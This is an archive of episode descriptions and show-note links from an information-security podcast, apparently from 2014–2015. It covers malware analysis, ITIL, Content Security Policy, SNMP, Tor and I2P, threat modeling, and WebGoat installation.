My podcast co-host Brian Boettcher, along with Kate Brew, an Austin, TX based security blogger, headed up this panel called "Red Team Vs. Blue Team". The idea was to ask people from various sides of the aisles (attackers and defenders) pressing questions about how the industry operates.
Infosec heavyweights like Kevin Johnson (@secureideas), Mano Paul (@manopaul), Josh Sokol (@joshSokol), made this a very excellent podcast...
We hope you enjoy!
Published on: July 13, 20152015-029: Big Brown cloud honeyblog with @theroxyd
Roxy, who we interviewed a few months ago on our podcast about hackerspaces, is back with us this week to discuss a project she is working on, called 'Big Brown Cloud'. If you've ever wanted to setup your own fake blog and send people to it to gain information on possible attacks, you've come to the right place.
We also get an update on the hackerspace that Jarrod, Sean, and Roxy were getting setup a few months ago. They've come a long way, and they are about to move into their new facility
https://thelab.ms/
Published on: July 6, 20152015-028: using log analytics to discover Windows malware artifacts
In this podcast, you'll learn about:
Log analytics software that can be used to parse system logs for naaty malware
Detecting Malware artifacts
learn about windows directory locations
looking for indicators like packing, changed hashes, etc
Tips for capturing malware using tools like RoboCopy
Learn about what code caves are and how malware hides inside them (http://www.codeproject.com/Articles/20240/The-Beginners-Guide-to-Codecaves)
SANS DFIR poster - https://www.sans.org/security-resources/posters/windows-forensics-evidence-of-75
Published on: June 29, 20152015-027- detecting malware in Windows Systems with Michael Gough
Michael Gough joined us again to discuss malware detection techniques on Windows systems. We talk about how you can modify Powershell's defaults to allow for better logging potential. Also, we find out some hidden gems that pretty much guarantee to let you know that you've been infiltrated.
Stay for the powershell security education, and you also learn some new terminology, like "Malware Archaeology", Malwarians, and 'Log-aholic', to name a few...
Published on: June 22, 20152015-026- Cloud Security discussion with FireHost
This week, we discuss various methods of enabling companies to move applications to cloud based platforms.
We discuss containers, like Docker, and how various hosting services handle converting businesses from a traditional data centers to a secure. cloud based entity.
We even discuss securing the data in the cloud, preventing bad guys from accessing it, as well as the cloud provider themselves, who can be served with a subpeona to hand over data.
Brakeing Down Security would like to thank FireHost for allowing Chase and Mike to join us.
Published on: June 14, 20152015-025: Blue Team Army, Powershell, and the need for Blue team education
With last week's revelation from Microsoft that they will support SSH, understanding powershell has become more important than ever as a tool to be used by blue teamers, both for adminstration, and to understand how bad guys will use it for nefarious deeds on your network.
Part 2 of our interview with Mick Douglas discusses a bit more about the DEV522 class that he teaches for SANS, and why it seems that blue team (defenders) are not getting the training they should. By being deficient in necessary skills, the knowledge between bad guys and the defenders widens.
Published on: June 8, 20152015-024: Is a good defense the best offense? Interview w/ Mick Douglas!
We had the opportunity to discuss with Mick Douglas the fact that there is a stigma of blue team always being on the losing end of the security. Is it because there are more tools for the pentesters or bad guys, or that it takes a massive IT budget to be secure? We don't believe so... Great insights into how a blue team can protect their network.
Published on: May 31, 20152015-023_Get to know a Security Tool: Security Onion!
Having a more secure network by deploying tools can be no easy task. This week, we show you a tool, Security Onion, that can give you an IDS and log analysis tool in less than 20 minutes.
http://blog.securityonion.net/p/securityonion.html
Published on: May 26, 20152015-022: SANS Top 25 Critical Security Controls-#10 and #11
When you're working with network infrastructure, there's a real need for proper configuration management, as well as having a proper baseline to work from.
Mr. Boettcher and I continue through the SANS Top25 Critical Security Controls. #10 and #11 are all dealing with network infrastructure. Proper patches, baselines for being as secure as possible. Since your company's ideal security structure needs to be a 'brick', and not an 'egg'.
Published on: May 17, 2015
2015-021: 24 Deadly Sins: Command injection
We continue our journey on the 24 Deadly Programming Sins. If you listened to last week's podcast, we introduced the book we were using as a study tool:
http://www.amazon.com/Deadly-Sins-Software-Security-Programming/dp/0071626751
This week is on command injection. We first discussed command injection as part of our OWASP Top 10 for 2013, but you'll be surprised just how easy devs compile conditions that allow for command injection into their code as well.
Published on: May 10, 2015Special Interview with Johnny Long!
At DerbyCon last year, Mr. Boettcher did a microcast with Johnny Long. An inspirational human being who left a life many info professionals dream of, and went to Africa to help disadvantaged people make a better life with access to technology.
Where is the audio you ask? Well, we've posted it on out Patreon so that they can have first dibs on it. We'll post it here this weekend for everyone.
He is a great individual and we hope you'll enjoy it.
Published on: May 8, 20152015-020 - Deadly Programming Sins - Buffer Underruns
Code Audits are a necessary evil. Many organizations resort to using automated tools, but tools may not find all issues with code. Sometimes, you need to take a look at the code yourself.
Mr. Boettcher and I begin going through the book "24 Deadly Sins of Software Security: Programming Flaws and How to Fix Them" What we covered this week is "buffer overruns", we discuss what they are, and how they occur.
Get ready for a crash course in code audits. The book is not required, but it definitely helps when we are discussing concepts.
We also mentioned our new Patreon account, so if you are a listener, and want to support what we do, you can give on a per month schedule. Donations are entirely optional, and if you don't wish to give, that's fine too.
24 Deadly Sins on Amazon:
Published on: May 3, 2015
2015-018- How can ITIL help you flesh out your infosec program?
When you're faced with major projects, or working to understand why your IDS fails every day at the same time, there must be a way to work that out. Or when you must do the yearly business continuity failover, you need a process oriented framework to track and ensure changes are committed in a sane, orderly manner.
ITIL is a completely versatile, flexible framework that scales with your organization. You can also use it with your software development lifecycle. You can use it to enhance major projects and security initiatives.
Tim Wood joins us for the second part of his interview. We discuss Change Management, Problem Management and making inter-departmental SLAs a reality for proper management of changes.
Tim Wood's Presentation: https://drive.google.com/file/d/0B-qfQ-gWynwiVS0zLTZidml0VzA/view?usp=sharing (view only)
Published on: April 26, 20152015-017: History of ITIL, and integrating Security
Much of InfoSec and Compliance is all about processes, procedures, controls, audits, and the proper management of all of these. To do so, you need a proper framework to make these as seamless as possible. ITIL is one of these types of frameworks.
We introduce Mr. Tim Wood on the podcast, who has over 20 years of ITIL experience and began ITIL implementations in banks and Healthcare systems in the United Kingdom. He currently works with different industries to change culture and make an ITIL a reality.
This week, we go over the History of ITIL, and understand the various incarnations from v1.0 to v3.0. You quickly understand where security will start fitting into all those facets of the ITIL framework.
Tim Wood's Presentation: https://drive.google.com/file/d/0B-qfQ-gWynwiVS0zLTZidml0VzA/view?usp=sharing (view only)
Published on: April 18, 20152015-016: Special Interview: Cybrary.it
Special interview this week! On the heels of their uber successful KickStarter campaign, we brought co-founder Ryan and one of the technical editors Anthony in to discuss what Cybrary is. We also discuss ways you can leverage it in your own business to get quality security awareness training, as well as train up your employees on infosec topics that can benefit your company and employees. You can find out more at http://www.cybrary.it
Published on: April 7, 20152015-015: 2015 Verizon PCI report
It's that time of year again... when all the reports come out that shows how various industries did over the last year.
Brakeing Down Security went over the results of the Verizon PCI report. Did companies do worse this year, or could they have actually improved? Listen to our analysis, and what companies can do to learn from this, and how you can use this report to help get a leg up when your QSA comes calling.
http://www.verizonenterprise.com/pcireport/2015/
Pay IRS using "Snapcard": http://www.coindesk.com/pay-taxes-bitcoin-snapcard-pay-irs/
According to the US Internal Revenue Service (IRS), virtual currencies are treated as "Property": http://www.irs.gov/uac/Newsroom/IRS-Virtual-Currency-Guidance
Published on: April 4, 20152015-014-SANS Top 20 Controls - #12 and #13
We continue our trek down the list of SANS Top 20 Critical Security Controls this week with #12 and #13 - Boundry Defense, and Controlled use of Administrative Privileges. Learn what you can do to shore up your network defenses, and how to handle admin privileges... When to give that kind of access, and how to make privileged access as secure as possible while still allowing administrators to do their work.
https://www.sans.org/media/critical-security-controls/CSC-5.pdf
http://www.openspf.org/
https://4sysops.com/
Published on: March 28, 20152015-013-Hackerspaces and their sense of community
We invited the organizers of the "TheLab.ms", a Dallas, Texas based hacker/makerspace on the podcast to talk about why they wanted to start a makerspace, the costs and plans to setup a hacker space, and some of the things you can do with a makerspace. We also understand the sense of community and the learning environment gained from these places.
If you are looking to start a 'space in your area, or looking to understand why they are needed in a community, you'll want to listen to Roxy, Sean, and Jarrod talk about the highs and lows and even some of the gotchas in setting up a space.
Published on: March 21, 20152015-012-Fill In podcast with Jarrod and Lee!
Mr. Boettcher went on vacation and was volunteering for Austin Bsides this week, and I needed to do a podcast, so I enlisted the aid of Lee Brotherston and Jarrod Frates discuss some important topics. We discuss the seemingly short talent pool for IT/IS positions. We talk about the ROWHAMMER vulnerability and how it may affect your organization. Additionally, we talk about how the NTP protocol is being maintained by one person and what can be done to help with that, as it is a critical piece of Internet Infrastructure, and finally, we figure out why PGP/GPG is not user-friendly, and if there are ways to make it better, or if it needs to be replaced permanently.
News of the week
-
RowHammer -
http://www.darknet.org.uk/2015/03/rowhammer-ddr3-exploit-what-you-need-to-know/
-
Lack of hire-able people in IT/IS - per Leviathan Sec report. https://www.leviathansecurity.com/blog/scarcity-of-cybersecurity-expertise/
-
NTP maintained by one guy ‘Father Time’
http://www.informationweek.com/it-life/ntps-fate-hinges-on-father-time/d/d-id/1319432
-
Moxie Marlinspike’s GPG/PGP rant: Perfection ruined the goal http://www.thoughtcrime.org/blog/gpg-and-me/
Published on: March 15, 2015
2015-011- Why does BeEF and metadata tracking keep I2P developers up at night?
In our continuing discussion with Jeff and "Str4d", we got right to the heart of the matter: Privacy and anonymity.
If you're trying to remain anonymous, what steps do the devs of I2P use to keep themselves as anonymous as possible. We also touch on what the "Browser Exploitation Framework", and why it scares the heck out of Jeff.
Finally, I ask them if there is any real 'good' sites on I2P, because of how the media seems to latch on to any story where we hear the bad things of any anonymizing network, is there a way we can improve the image of anonymizing networks.
*** If you have a blog, and it's about security/privacy/compliance, please consider adding us as a write-in for '2015 Best New Security Podcast' here:
https://www.surveymonkey.com/s/securitybloggers***
Show notes: https://docs.google.com/document/d/1Vh0HiUDXchesI2-BlthztoIIswZa0GZa_Jg0mOu0ao4/edit?usp=sharing
Published on: March 7, 20152015-010 - How can you use I2P to increase your security and anonymity?
Mr. Boettcher got a hold of the developers and maintainers of the anonymizing network "I2P". We talked with "str4d" and "Jeff" this week.
In Part 1 of the interview, we discuss the technical aspects of I2P, how it functions, how 'Garlic routing' works, and how the flood Fill servers allow for I2P to function effectively.
In the final segment, we discuss form factors, specifically if I2P is available for embedded systems like Raspberry Pi.
If you find Tor not to your liking, give I2P a try... it's goals are the same, but the method of security and privacy are different. Plus, as you can hear from the podcast, it's very much a tight knit community of security and privacy enthusiasts.
Show notes, links, and contact info:
https://docs.google.com/document/d/1Vh0HiUDXchesI2-BlthztoIIswZa0GZa_Jg0mOu0ao4/edit?usp=sharing
Published on: February 28, 20152015-009-Part 2 with Pawel Krawczyk
The second part of our interview with Pawel discussed Content management systems, and how you can integrate CSP in Drupal, Django, and the like.
Content managers, you'll want to listen to this, especially about how CSP can help you secure the content on your systems, as well as protect customers from web based attacks using the sandboxing functions of CSP
Pawel's Blog = ipsec.pl
Pawel's CSP builder app = cspbuilder.info
Quick Guide to CSP: http://content-security-policy.com/
Published on: February 21, 2015
2015-008- Make your web Apps more secure with Content Security Policy (part 1)
Pawel Krawczyk did an interview with us about Content Security Policy. Learn about what it is, and whether or not the latest browsers can support it.
We also talk about how you can get around it, if there are ways to avoid it if you are a bad guy, and how you can get the most out of it.
If you're a web developer, and want to reduce your site's chances of allowing XSS, you'll want to take a listen to this.
https://w3c.github.io/webappsec/specs/content-security-policy/#changes-from-level-1
https://w3c.github.io/webappsec/specs/content-security-policy/#directive-sandbox
Published on: February 16, 20152015-007-SANS_Top20_14and15--Proving_Grounds_Microcast with Megan Wu!
Extra special treat this week! We do a continuation of our review of the Top 20 Security Controls, in which we do #14 and #15, which all of you will find very interesting.
But the real reason we are posting this today is the Call for Papers and Call for Mentors for the Bsides Las Vegas Proving Grounds! We invited Magen Wu (@tottenkoph) on to discuss. If you've ever asked yourself "I'd like to give a talk, but they'd never put me on" NOW IS YOUR CHANCE! :)
This is a great opportunity if you're a veteran speaker, or just want to give back to the community at large... You can mentor a n00b to help them create a topic, help them hone their paper, and be with them when they give the talk at Bsides Las Vegas in July.
Many thanks to @tottenkoph and @securitymoey. They need your help, both as a mentor and a mentee. This is also an excellent networking opportunity. You get 1-on-1 access to an often influential mentor, someone in the infosec community, and your talk will be seen by several hundred people. hmmm.... maybe I should put one in :D
-----
SANS #14-10:
Ensure that the log collection system does not lose events during peak activity, and that the system detects and alerts if event loss occurs (such as when volume exceeds the capacity of a log collection system). This includes ensuring that the log collection system can accommodate intermittent or restricted-bandwidth connectivity through the use of handshaking / flow control.
------
"Dirty Rhodes" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
2015-006- Is your ISP doing a 'man-in-the-middle' on you?
During our research with Lee Brotherston, who we had on last week for our podcast on threat modeling, we got to listen to one of his talks about how his ISP in Canada was actively doing a Man-in-Middle injection of a banner into sites that he visited.
We were intrigued, and also gobsmacked (I can say that, right?) about the brashness of an ISP not apparently understanding the security implications of this, so we had him back on totalk about the finer points of his research. The bad news? Other ISPs, including American ISPs are using this technology.
This is one of those podcasts that you need to tell your friends about, cause it's truly surprising the lengths ISPs go to injecting content into your pages.
We also have a short message about the Bsides Las Vegas Proving Grounds this year... If you've wanted to present a paper at a conference, and have a mentor guide you through the process, hit them up on the Proving Grounds page at http://www.bsideslv.com
Show notes (lots of info): https://docs.google.com/document/d/1YLkiRE1SVIyWquWc-iQrESWlT10rSJmW1VcrOX3kQZ0/edit?usp=sharing
"Dirty Rhodes" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
2015-005: Threat Modeling with Lee Brotherston
Threat Modeling... ranks right up there with Risk Assessments in importance... You gotta figure out how the applications you're creating or the systems you're engineering are secure. It really takes knowing your application and really, knowing the enemies/factors that can cause your application to fail, from santizing inputs on a web app, to making sure that your code doesn't have use-after-free bugs.
Brakeing Down Security talked about conducting threat modeling and application reviews with Lee Brotherston (@synackpse) from Leviathan Security (@LeviathanSecurity) this week. We discuss types of risk analysis, including one named 'Binary Risk Analysis', which may simplify assessment of your computer systems.
Show notes = https://docs.google.com/document/d/1K-eycek2Xud7loVC4yrHg6eHCY0oyztV_ytbY433oYk/edit?usp=sharing
"Dirty Rhodes" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
2015-004-SANS Top 20: 20 to 16
Mr. Boettcher and I went over the bottom 5 of the SANS Top 20 security controls that businesses should implement. When put into the right order, you should be able to have an environment that is able to withstand most any attack.
We also talk about 5 'Quick Fixes' that will put you on the right track with becoming more secure.
You may be surprised at what is considered a priority... have a listen: (QR code links to the mp3)
Show notes: https://docs.google.com/document/d/1JuRJ-RPTmw50pTeO82rb9_rC8tFf53eiUzkppfwQvs0/edit?usp=sharing
"Dirty Rhodes" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
All About Tor
Brakeing Down Security tackles the 'Deep Web' this week... yep, we talk about Tor. If you don't have a lot of experience with this or wonder how it works, we give you a little history and help you understand the traffic flow works.
We even give you some advice on de-identification and things you shouldn't allow when traveling the Deep Web, like Javascript, Flash, and Java.
Show Notes:
https://docs.google.com/document/d/1vBI_bg_0RzF_sSNMj84xQpEZGUrxtAkB8SxZ08MzUi0/edit?usp=sharing
"Dirty Rhodes" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Episode 2: Big Trouble in Small Businesses
Security's the same, the world around... and is a necessity in businesses of all sizes, from the mega-corporations, all the way down to the business with 10 employees in a garage in suburbia.
This week, Mr. Boettcher and I discuss security in small businesses. What is needed to make security part of the culture of a new company. We discuss some open source tools to ensure that networks are monitored properly, logs are collected, collated, and analyzed. And better yet, these are on the cheap, which is helpful for a small business on a tight budget.
QR code links directly to the episode...
http://www.ihotdesk.co.uk/article/801717385/Most-small-businesses-have-faced-InfoSec-breach-recently
https://blog.whitehatsec.com/infosec-europe-wrapup/
http://www.infosectoday.com/Articles/DRPlanning.htm
"Dirty Rhodes" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
2015-001- "unhackable" or "attacker debt"
This is a quick little podcast I did without Mr. Boettcher about a Twitter discussion that occurred when Dr. Neil Degrasse Tyson mentioned that we should just make computers 'unhackable'.
The first episode of the 2015 season of Brakeing Down Security is here!
Tweet from Dr. Neil Degrasse Tyson
https://twitter.com/neiltyson/status/551378648578916353
Rebuttal from Kevin Johnson
https://twitter.com/secureideas/status/551510885441998848
"Dirt Rhodes"
Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Published on: January 4, 2015Is Compliance running or ruining Security Programs?
We at Brakeing Down Security world headquarters don't understand the concept of 'End of the Year' podcast, so consider this the "End-End of the Year" podcast.
We talked about the order of things... whether Compliance is a detriment to Security, and who should be running who.
So pull up a glass of eggnog, grabbing another cookie, and put another log on the fire, cause Brakeing Down Security is throwing out one more for the year! Happy Holidays... all of them... :)
Published on: December 26, 2014Brakeing Down/Defensive Security Mashup!
It's a Super Deluxe sized Brakeing Down Security this week...
It's something you've dreamed of forever (or not), but Jerry Bell and Andrew Kalat from Defensive Security Podcast stopped by and we made ourselves a podcast baby... Boy, was it ugly :)
I'm just kidding, we had a great time discussing some news, and going over what we learned... and any good end-of-year podcast must have predictions...
We also discussed Sony, caused it's huge news of the year, and talked about Target, because we love dissing PCI... ;)
There might be a few bad words, so if you have small ears around, be advised...
When you're done, check out the other 96 episodes of Defensive Security, and check out our 55 other episodes..
http://www.defensivesecurity.org/
Twitter handles:
Andrew Kalat: https://twitter.com/lerg
Jerry Bell: https://twitter.com/Maliciouslink
Icon provided by DefensiveSecurity.org... I'd imagine they'd let us use it, since they were on the podcast ;)
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Tyler Hudak (@secshoggoth) Discusses incident respose, and DIY malware research
This week, Tyler gave us a great deal of information on where to start if you wanted to become a malware researcher. He also gave us websites where you can get malware and ways to analyze it.
We asked Tyler what blue teams can do when they are infected, and he gave us some excellent advice...
I also recite some prose from a classic horror author, so come for the malware, stay for the prose! :)
***NOTE: I guess now would be a good time to mention that many of the links below have unsafe software and actual malware payloads, so use with extreme caution. Especially do not download anything from these sites unless it's in a VM that is not on your companies assets.***
http://www.hopperapp.com/ - Disassemble OSA binaries
http://en.wikibooks.org/wiki/X86_Disassembly/Disassemblers_and_Decompilers - other Disassemblers
http://vxheaven.org/ - Virus Heaven
http://www.malwaredomainlist.com/ - Find websites serving malware
http://oc.gtisc.gatech.edu:8080/ - Georgia Tech malware repository
Sandboxie - http://www.sandboxie.com/
KoreLogic - http://www.korelogic.com/ (lots of great tools here)
http://secshoggoth.blogspot.com/ - Tyler's Blog
Published on: December 15, 2014Tyler Hudak discusses malware analysis
Tyler Hudak (@secshoggoth) came to discuss with us the process of doing analysis on malware binaries. We talk about MASTIFF, his malware framework. We also discuss how to gain information from malware program headers, and some software that is used to safely analyze it.
Helpful Links:
Ida Pro: https://www.hex-rays.com/products/ida/
Process Monitor - http://technet.microsoft.com/en-us/sysinternals/bb896645.aspx
Mastiff White Paper: http://digital-forensics.sans.org/blog/2013/05/07/mastiff-for-auto-static-malware-analysis
Mastiff latest: http://sourceforge.net/projects/mastiff/files/mastiff/0.6.0/
cuckoo sandbox: www.cuckoosandbox.org
Anubis: https://anubis.iseclab.org/
PE Headers: http://en.wikipedia.org/wiki/Portable_Executable
ELF: http://fr.wikipedia.org/wiki/Executable_and_Linkable_Format
REMnux- reverse engineering linux distro:https://remnux.org/
Inetsim: http://www.inetsim.org/
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Part 2 w/ Ben Donnelly -- Introducing Ball and Chain (making password breaches a thing of the past)
Last week, we talked with Ben Donnelly about ADHD (Active Defense Harbinger Distro). But Ben isn't a one trick pony, oh no... this young punk is trying to solve fundamental problems in the business industry, in particular securing passwords. That's why he's been working with Tim Tomes (@lanmaster53)invented 'Ball and Chain', which is a large (>2TB) file that can be used to help generate passwords and entropy.
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
New Tumblr Post
It's a bit meta, cause this will show up there in a few minutes, but Brakeing Down Security now has a Tumblr...
Don't know why it took so long... We'll be posting from other Tumblr blogs, and our episodes will post there... I hope you will spread the word...
http://brakeingdownsecurity.tumblr.com/
Published on: November 30, 2014Thank you from Brakeing Down Security
When Mr. Boettcher and I started the Brakeing Down Security Podcast, we really did it for 2 reasons:
1. We wanted to educate people and ourselves about information security topics, and do it in a way that was fun
2. Educate ourselves about some topics that we were not familar with, because infosec and compliance is such a vast range of topics and skills
Mr. Boettcher and I want to extend a warm and hearty THANK YOU SO MUCH for inviting us into your podcasting listening device. We realize there are a ton of infosec podcasts out there, and you allowing us to share space with them makes us so happy.
Look for more podcasts in December, and in the new year, look for more videos and excellent interviews.
As we've always said, we do this podcast for you, and we want to know what you want to hear or see. If you have a topic you'd love to have us talk about, or you'd like to come on our podcast and talk about something you're working on, please let us know. We want input, so please leave us some feedback on iTunes, or tweet our podcast to your friends
Happy Thanksgiving to our US fans, Happy Thursday for the rest of the world...
Bryan Brake
Creator, Co-Host of the Brakeing Down Security podcast
@bryanbrake
@boettcherpwned
Website: www.brakeingsecurity.com
RSS: brakeingsecurity.libsyn.com/rss
iTunes: https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2
EMAIL: [email protected]
Published on: November 27, 2014
Active Defense and the ADHD Distro with Ben Donnelly
We snagged an interview with Benjamin Donnelly, a maintainer of the Active Defense Harbinger Distribution (ADHD). version 0.60
A thoroughly enjoyable conversation with a new up-and-coming security professional. He's the future, and he is already contributing a lot of great info to the infosec industry.
Part 1 is all about ADHD, next week, we discuss his talk about a project he's working on that will remove the threat of password breaches using 'Ball and Chain'. And it's all open source...
ADHD ISO: http://sourceforge.net/projects/adhd/
CryptoLocked: https://bitbucket.org/Zaeyx/cryptolocked
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
WebGoat install video with Mr. Boettcher!
My man Mr. Boettcher posted up a video on how to install OWASP's WebGoat Vulnerable web application!
He walks you through WebGoat 5.4, and even gives you some tips on solving issues that he'd found. And to make it even easier, he's given you some instructions below.
Hope you enjoy, especially if you've had issues setting up WebGoat in the past.
Webgoat 5.4 instructions
========================
1. search google and download the war file
(From Bryan: Here's the link -- https://code.google.com/p/webgoat/downloads/list )
2. install tomcat
sudo apt-get install tomcat7
3. move the war file to tomcat webapp directory
sudo mv ~/Downloads/WebGoat-5.4.war /var/lib/tomcat7/webapps/WebGoat.war
4. edit tomcat-users.xml by adding the content below
sudo vi /var/lib/tomcat7/conf/tomcat-users.xml
5. restart tomcat
sudo /etc/init.d/tomcat7 restart
6. in your browser, type localhost:8080/WebGoat/attack
Active Defense: It ain't 'hacking the hackers'
Active Defense... It conjures images of the lowly admin turning the tables on the evil black hat hackers, and giving them a dose of their own medicine by hacking their boxes and getting sweet, sweet revenge... But did you know that kind of 'revenge' is also rife with legal rammifications, even bordering on being illegal??
This week, Mr. Boettcher and I tackle this prickly subject, and discuss some software you can use to 'deter, prevent, and dissuade' potential bad guys...
ADHD Training (courtesy of Paul's Security Weekly Podcast): http://blip.tv/securityweekly/active-defense-harbinger-distribution-release-party-7096833
Artillery - https://www.binarydefense.com/project-artillery/
DenyHosts - http://denyhosts.sourceforge.net/
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Interview Part 2 with Paul Coggin: Horror stories
If you think Halloween was scary, Paul Coggin gives us another reason to curl up in the fetal position as he goes explains Lawful Intercept, and Route Maps. And what's worse, your 3rd party auditors are starting to get the tools that will make you address network protocol issues.
Lots of great material here below in our show notes, including some tools (free) that you can use to get yourself schooled on network protocols
BGPmon - http://www.bgpmon.net/
Renesys (now Dyn Research) http://research.dyn.com/
BGP Play - http://bgplay.routeviews.org/
BGP Looking glass servers - http://www.bgp4.as/looking-glasses
yersinia - http://www.yersinia.net/
Fx Twitter handle - https://twitter.com/41414141
ernw - https://www.ernw.de/
Cisco Route Maps - http://www.cisco.com/c/en/us/support/docs/ip/border-gateway-protocol-bgp/49111-route-map-bestp.html
Paul's Bsides Nashville talk - http://www.irongeek.com/i.php?page=videos/bsidesnashville2014/300-bending-and-twisting-networks-paul-coggin
Huawei ENSP - http://enterprise.huawei.com/en/products/network-management/automation-tools/tools/hw-201999.htm
NRL Core - http://www.nrl.navy.mil/itd/ncs/products/core
NRL Mgen - http://www.nrl.navy.mil/itd/ncs/products/mgen
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Interview with Paul Coggin (part 1)
One of the talks my colleague got to see was Paul Coggin's talk about Internetworking routing and protocols. In this interview, we dicsuss some tools of the trade, how MPLS isn't secure, and why you should be doing end-to-end encryption without allowing your VPN or circuit provider to do it for you...
If you have any interest in network security, including the higher order network protocols like BGP, MPLS, ATM, etc... You'll want to check out his DerbyCon talk, and our interview...
Paul's Derbycon 2014 talk - http://www.irongeek.com/i.php?page=videos/derbycon4/t319-bending-and-twisting-networks-paul-coggins
Hacking SNMP tips and tricks: http://securityreliks.securegossip.com/2011/04/hacking-snmp-in-a-few-simple-steps/
SNMPBlow: http://www.stoptheplague.com/?p=19
ERNW: https://www.ernw.de/research-community/index.html
Fx paper on Lawful Intercept: http://phenoelit.org/stuff/CSLI.pdf
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Learning about SNMP, and microinterview with Kevin Johnson
In an effort to educate ourselves for an upcoming interview, we sat down and talked about SNMP (Simple Network Management Protocol). We get into the basics, the ins and outs of the protocol, the different tools that use (or exploit) SNMP, and we talk about how to better secure your SNMP implementation. YOu should listen to this, because next week's interview will knock your socks off. :)
Finally, We end with a DerbyCon interview Mr. Boettcher snagged with our friend Mr. Kevin Johnson about how we need to regulate ourselves with regard to a code of ethics, before someone regulates us... When one 'white hat' can run code on a server he/she doesn't control (unpatched Shellshock) and thinks it's okay, where do we draw the line from what is right, and what violates the CFAA? Mr. Johnson looks for an answer with our Mr. Boettcher.
Wikipedia SNMP article:http://en.wikipedia.org/wiki/Simple_Network_Management_Protocol
SNMP Primer: http://www.tcpipguide.com/free/t_SNMPProtocolOverviewHistoryandGeneralConcepts.htm
SNMP OIDS and MIBS: http://kb.paessler.com/en/topic/653-how-do-snmp-mibs-and-oids-work
SNMP vulnserabilities - http://packetstormsecurity.com/search/?q=snmp
SNMP Primer (IBM):http://pic.dhe.ibm.com/infocenter/tpfhelp/current/index.jsp?topic=%2Fcom.ibm.ztpf-ztpfdf.doc_put.cur%2Fgtpc1%2Fpdus.html
SNMP amplification attacks: http://www.pcworld.com/article/2159060/ddos-attacks-using-snmp-amplification-on-the-rise.html
Securing SNMPv3: http://www.sans.org/reading-room/whitepapers/networkdevs/securing-snmp-net-snmp-snmpv3-1051
Kevin Johnson/James Jardine DerbyCon Talk: http://www.irongeek.com/i.php?page=videos/derbycon4/t308-ethical-control-ethics-and-privacy-in-a-target-rich-environment-kevin-johnson-and-james-jardine
Image courtesy of Wikipedia.de
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Keep Calm and take a tcpdump! :)
Tcpdump is just one of the tools that will make troubleshooting network issues, or testing applications, or even finding out what traffic is being generated on a host all that much easier. This podcast is to help you understand the Tcpdump program, and how powerful it is...
http://danielmiessler.com/study/tcpdump/
http://www.thegeekstuff.com/2010/08/tcpdump-command-examples/
http://www.tecmint.com/12-tcpdump-commands-a-network-sniffer-tool/
http://www.amazon.com/TCP-Illustrated-Vol-Addison-Wesley-Professional/dp/0201633469
http://www.computerhope.com/unix/tcpdump.htm
http://www.commandlinefu.com/commands/using/tcpdump -- excellent examples
http://www.amazon.com/Practical-Packet-Analysis-Wireshark-Real-World/dp/1593272669/
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Part 2 with Jarrod Frates - how pentesting is important
Part 2 of our interview with Jarrod Frates (FRAY-tes). We ask him about the value that a pentest can create, the way that that 'perfect' pentest can change culture and help create dialogue.
Also, we talk about how to take your automated testing info and then shift gears to manual testing... when to stop doing automated testing, and do the manual testing.
Hope you enjoy, have a great week!
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
DerbyCon report and Shellshock news
We went a little off the beaten path this week. I wanted to talk to Mr. Boettcher about his experience at DerbyCon, and we ended up having another friend of ours who also attended DerbyCon, Jarrod Frates, join us for a bit of discussion. We discussed several talks, and even spent a little bit of time talking about ShellShock and it's larger implications for those programs that are ubiquitous, yet are not being audited, like bash. (The llama graphic will make more sense next week...) :)
http://www.irongeek.com/i.php?page=videos/derbycon4/t109-et-tu-kerberos-christopher-campbell
http://www.irongeek.com/i.php?page=videos/derbycon4/t217-hacking-mainframes-vulnerabilities-in-applications-exposed-over-tn3270-dominic-white
